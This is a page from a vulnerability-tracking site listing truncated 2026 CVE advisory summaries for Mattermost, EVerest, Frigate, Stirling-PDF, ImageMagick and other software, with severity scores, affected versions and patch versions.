Total CVEs

141,249

Critical Severity

3,795

High Severity

13,708

Last 7 Days

2,157
Quick preset (or use dates below)
Clear Filters
๐Ÿ“… Showing Year: 2026 (January 1 - December 31, 2026) View All Years โ†’
Showing 8,261 - 8,280 of 13,819 CVEs
CVE-2026-33759 MEDIUM - 5.3

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/playlistsVideos.json.php` endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including `watch_later` and `favorite` types...

Vendor: composer
Product: wwbn/avideo
Published: Mar 26, 2026
Source: GitHub

OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. In versions prior to 1.13.1, under specific conditions, models using conditions with caching enabled can result in two different check requests producing the same cache ke...

Vendor: go
Product: github.com/openfga/openfga
Published: Mar 26, 2026
Source: GitHub
CVE-2026-33535 MEDIUM - 4.0

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-18 and 6.9.13-43, an out-of-bounds write of a zero byte exists in the X11 `display` interaction path that could lead to a crash. Versions 7.1.2-18 and 6.9.13-43 patch the issue.

Vendor: nuget
Product: Magick.NET-Q16-AnyCPU
Published: Mar 26, 2026
Source: GitHub
CVE-2026-3116 MEDIUM - 4.9

Mattermost Plugins versions <=11.4 11.0.4 11.1.3 11.3.2 10.11.11.0 fail to validate incoming request size which allows an authenticated attacker to cause service disruption via the webhook endpoint. Mattermost Advisory ID: MMSA-2026-00589

Published: Mar 26, 2026
Source: NVD
CVE-2026-3115 MEDIUM - 4.3

Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to apply view restrictions when retrieving group member IDs, which allows authenticated guest users to enumerate user IDs outside their allowed visibility scope via the group retrieval endp...

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
CVE-2026-3114 MEDIUM - 6.5

Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to validate decompressed archive entry sizes during file extraction which allows authenticated users with file upload permissions to cause a denial of service via crafted zip archives conta...

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
CVE-2026-3113 MEDIUM - 5.0

Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to set permissions on downloaded bulk export which allows other local users on the server to be able to read contents of the bulk export.. Mattermost Advisory ID: MMSA-2026-00593

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
CVE-2026-3112 MEDIUM - 6.8

Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to validate Advanced Logging file target paths which allows system administrators to read arbitrary host files via malicious AdvancedLoggingJSON configuration in support packet generation. ...

Vendor: mattermost
Product: mattermost_server
Published: Mar 26, 2026
Source: NVD
CVE-2026-34071 MEDIUM - 5.4

Stirling-PDF is a locally hosted web application that allows you to perform various operations on PDF files. In version 2.7.3, the /api/v1/convert/eml/pdf endpoint with parameter downloadHtml=true returns unsanitized HTML from the email body with Content-Type: text/html. An attacker who sends a mali...

Vendor: Stirling-Tools
Product: Stirling-PDF
Published: Mar 26, 2026
Source: NVD
CVE-2026-33470 MEDIUM - 6.5

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In version 0.17.0, a low-privilege authenticated user restricted to one camera can access snapshots from other cameras. This is possible through a chain of two authorization problems: `/api/timeline` retur...

Vendor: blakeblackshear
Product: frigate
Published: Mar 26, 2026
Source: NVD
CVE-2026-33469 MEDIUM - 6.5

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In version 0.17.0, an authenticated non-admin user can retrieve the full raw Frigate configuration through `/api/config/raw`. This exposes sensitive values that are intentionally redacted from `/api/config...

Vendor: blakeblackshear
Product: frigate
Published: Mar 26, 2026
Source: NVD
CVE-2026-33438 MEDIUM - 6.5

Stirling-PDF is a locally hosted web application that allows you to perform various operations on PDF files. Versions starting in 2.1.5 and prior to 2.5.2 have Denial of Service (DoS) vulnerability in the Stirling-PDF watermark functionality (`/api/v1/security/add-watermark` endpoint). The vulnerabi...

Vendor: Stirling-Tools
Product: Stirling-PDF
Published: Mar 26, 2026
Source: NVD
CVE-2026-33402 MEDIUM - 6.1

Sakai is a Collaboration and Learning Environment (CLE). In versions 23.0 through 23.4 and 25.0 through 25.1, group titles and description can contain cross-site scripting scripts. The patch is included in releases 25.2 and 23.5. As a workaround, one can check the SAKAI_SITE_GROUP table for titles a...

Vendor: sakaiproject
Product: sakai
Published: Mar 26, 2026
Source: NVD
CVE-2026-33015 MEDIUM - 5.2

EVerest is an EV charging software stack. Prior to version 2026.02.0, even immediately after CSMS performs a RemoteStop (StopTransaction), the EVSE can return to `PrepareCharging` via the EV's BCB toggle, allowing session restart. This breaks the irreversibility of remote stop and can bypass op...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-33014 MEDIUM - 5.2

EVerest is an EV charging software stack. Prior to version 2026.02.0, during RemoteStop processing, a delayed authorization response restores `authorized` back to true, defeating the `stop_transaction()` call condition on PowerOff events. As a result, the transaction can remain open even after a rem...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-29905 MEDIUM - 6.5

Kirby CMS through 5.1.4 allows an authenticated user with 'Editor' permissions to cause a persistent Denial of Service (DoS) via a malformed image upload. The application fails to properly validate the return value of the PHP getimagesize() function. When the system attempts to process thi...

Vendor: composer
Product: getkirby/cms
Published: Mar 26, 2026
Source: NVD
CVE-2026-29044 MEDIUM - 5.0

EVerest is an EV charging software stack. Prior to version 2026.02.0, when WithdrawAuthorization is processed before the TransactionStarted event, AuthHandler determines `transaction_active=false` and only calls `withdraw_authorization_callback`. This path ultimately calls `Charger::deauthorize()`, ...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-27814 MEDIUM - 4.2

EVerest is an EV charging software stack. Versions prior to 2026.02.0 have a data race (C++ UB) triggered by an A 1-phase โ†” 3-phase switch request (`ac_switch_three_phases_while_charging`) during charging/waiting executes concurrently with the state machine loop. Version 2026.02.0 contains a patch.

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-27813 MEDIUM - 5.3

EVerest is an EV charging software stack. Versions prior to 2026.02.0 have a data race leading to use-after-free. This is triggered by EV plug-in/unplug and RFID/RemoteStart/OCPP authorization events (or delayed authorization response). Version 2026.2.0 contains a patch.

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD
CVE-2026-26073 MEDIUM - 5.9

EVerest is an EV charging software stack. Versions prior to 2026.02.0 have a data race leading to possible `std::queue`/`std::deque` corruption. The trigger is powermeter public key update and EV session/error events (while OCPP not started). This results in a TSAN data race report and an ASAN/UBSAN...

Vendor: EVerest
Product: everest-core
Published: Mar 26, 2026
Source: NVD